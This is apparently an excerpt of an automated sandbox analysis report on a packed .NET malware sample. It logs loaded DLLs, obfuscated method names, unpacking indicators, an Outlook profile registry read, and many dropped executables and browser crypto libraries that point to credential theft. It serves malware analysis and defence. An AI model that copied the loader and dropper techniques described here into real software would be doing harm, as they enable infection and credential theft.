                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: linkinfo.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: ntshrui.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: cscapi.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: edputil.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: slc.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: sppc.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: shfolder.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: msacm32.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: riched20.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: usp10.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: msls31.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: explorerframe.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: sfc.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpWindow found: window name: TMainForm
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nikko Video Compressor_is1
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic file information: File size 2457088 > 1048576
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x236c00
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: \??\C:\Users\user\Documents\iofolko5\day2_mixApp.pdbws\ source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C51000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.PDB"fal source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C51000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: d:\a42sr32\win32_x86\release\pdb\UniverseDesigner\designer.pdb source: kJHbagG0C4H5BEyYJQeInLfF.exe, 0000000C.00000002.2391284217.0000000000525000.00000002.00000001.01000000.0000000B.sdmp, kJHbagG0C4H5BEyYJQeInLfF.exe, 0000000C.00000002.2392516588.0000000002420000.00000004.00001000.00020000.00000000.sdmp, kJHbagG0C4H5BEyYJQeInLfF.exe, 0000000C.00000000.1788478700.0000000000525000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C51000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: PE.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1509746400.0000000002F50000.00000004.08000000.00040000.00000000.sdmp, XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2044194881.00000000047AF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\hSHxNXg.pdb source: XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2192250317.0000000005FD0000.00000004.08000000.00040000.00000000.sdmp, XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2044194881.00000000047AF000.00000004.00000800.00020000.00000000.sdmp, XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2044194881.0000000004631000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: HPJo8C:\Windows\day2_mixApp.pdb source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2113363514.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: BotClient.pdb source: XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: day2_mixApp.pdb source: aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000002.2138573986.0000000000C51000.00000004.00000020.00020000.00000000.sdmp, aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000000.1787917500.00000000001B2000.00000002.00000001.01000000.0000000A.sdmp

                        Data Obfuscation

                        barindex
                        Detected unpacking (changes PE section rights)
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeUnpacked PE file: 9.2.5Hyf8PuolQS_j4ZkhvHWpkWr.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                        Detected unpacking (creates a PE file in dynamic memory)
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeUnpacked PE file: 12.2.kJHbagG0C4H5BEyYJQeInLfF.exe.2270000.2.unpack
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.2f50000.0.raw.unpack, Ca01BQGh9DxiBOJwup.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: 0x9C5620ED [Tue Feb 11 12:37:01 2053 UTC]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00567110 push ecx; ret 3_2_00567123
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeCode function: 6_2_024C2809 push eax; retn 0071h6_2_024C280A
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_004014D9 pushad ; ret 9_2_004014E9
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_004031DB push eax; ret 9_2_004032AB
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_025F1540 pushad ; ret 9_2_025F1550
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_028522F6 push B63524ADh; retn 001Fh9_2_0285232D
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_02852DF3 pushfd ; iretd 9_2_02852DF4
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_02853F53 push esp; ret 9_2_02853F55
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeCode function: 11_2_02F52809 push eax; retn 0071h11_2_02F5280A
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00503196 push ecx; ret 12_2_005031A9
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004107EE push 02E98151h; retf 0000h12_2_004107F3
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00502A1C push ecx; ret 12_2_00502A2F
                        Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.2f50000.0.raw.unpack, KASIU9JAUDHSAHJDUHUDASUDUADAI0DKSFISJFUDHUFHHYU.csHigh entropy of concatenated method names: 'OMFx84NSU3Aj89yeQCX', 'LAX01SNrXLuYFtkUKZE', 'iy9SsMNm29gB450FtMd', 'dBJrEtNGIa6qVBG9EBQ', 'rVg9gbNXhuTUCax3Faw', 'SqGmZ9Nwos9SN5Q7lkZ', 'GSe2iiNdiIejkDmaBS8', 'LqmMVpNxj2A5NG3wBxw', 'gYNBsNNfxAmxgoLk8AY', 'YxEaVbN7rCtxCfwOIGb'
                        Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.2f50000.0.raw.unpack, psm102r62ZNKXfMgLP.csHigh entropy of concatenated method names: 'OPSws322xfEh0', 'MODr39Nq5MiabxlX31k', 'iQoS09NJ2QNv2l3Nldp', 'CJQKDaN3RqE5Z376xIt', 'pj3HvaNg4CuSslIZxHe', 'aGob5JNuDhjrh89tMF7', 'OJrIsVNcKpdpxmnyCdy', 'nvy9T7NQKdlZSSpjdYZ', 'VWEEy8N4s3YgJEZssn2', 'hiS9r5NbbCsErEIxnl5'
                        Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.2f50000.0.raw.unpack, Component1.csHigh entropy of concatenated method names: 'Dispose', 'c2ZnNKXfM', 'KdItahZbaqrPOGXMMIH', 'F6Y0glZWI5sNge0KygR', 'oiohBeZubh6iBGSEkrx', 'eHnLj8Z41B6OG7M1JDy', 'N4gwHqZEFQ33Xh9XSL4', 'UsxTXAZipbL0y4O7ig6', 'lWEAf5ZlGZ9tBNchonB'
                        Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.2f50000.0.raw.unpack, UserControl1.csHigh entropy of concatenated method names: 'Dispose', 'F2igcbrUX', 'XHGgAUZzLmxCg9LHS8J', 'S8TWddN28E6t6e1W5DI', 'nxnywSZIvTRDeZkh3vn', 'Lg0nedZDohNDcCeYfhA', 'MCqqDaNZbmCaRq0a6S3', 'pte1vQNNcjSXyOcA1wm', 'FihZepNhpEadD2XS1mj', 'v4bBBrN14WWJwYVFB1v'
                        Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.2f50000.0.raw.unpack, Hg0i8ysWBkmOQpOTDa.csHigh entropy of concatenated method names: 'BBiryfpB2', 'KI0GlCWQr', 'nZK2JcQAs', 'lkTeKjlkc', 'RYq1Z9XkI', 'XOTf7va1f', 'Dispose', 'YAroKCCXX', 'acfjChBBkMo7PdIk7G', 'MFS1TWc0IT345kpNHi'
                        Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.2f50000.0.raw.unpack, Ca01BQGh9DxiBOJwup.csHigh entropy of concatenated method names: 'Qr5ud0NzY98AOC9xd95', 'G0Y0Wrh2oh1RhmJKSXb', 'X83AawNIkZucWFsrjDy', 'uZXqgXNDChJaWlp6NOY', 'ce4DmfsmSrOT856tDgfrkMb', 'qNiCQfbwXf', 'TgalQGhh96LsT9w8Qmj', 'Fw7QQNh18VntnfmGixE', 'ILFoXIhoc2Bm12rmWG4', 'AZNUskhyETNOaYTT1jk'

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files to the document folder of the user
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exegmoZLMPgmA7iERod (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exeFile created: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.exe (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ed9885d9aee_Day2[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-QPPD9.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vsfdhgg15[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9PSDC.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcr71.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ebb3bf78bd6_Send[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\66e705d09b33c_jack[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-I7KQ2.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9PSDC.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\libeay32.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\Qt5OpenGL.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\noode[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ee79315857f_setup33333[1].exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeFile created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exegmoZLMPgmA7iERod (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-213O2.tmpJump to dropped file
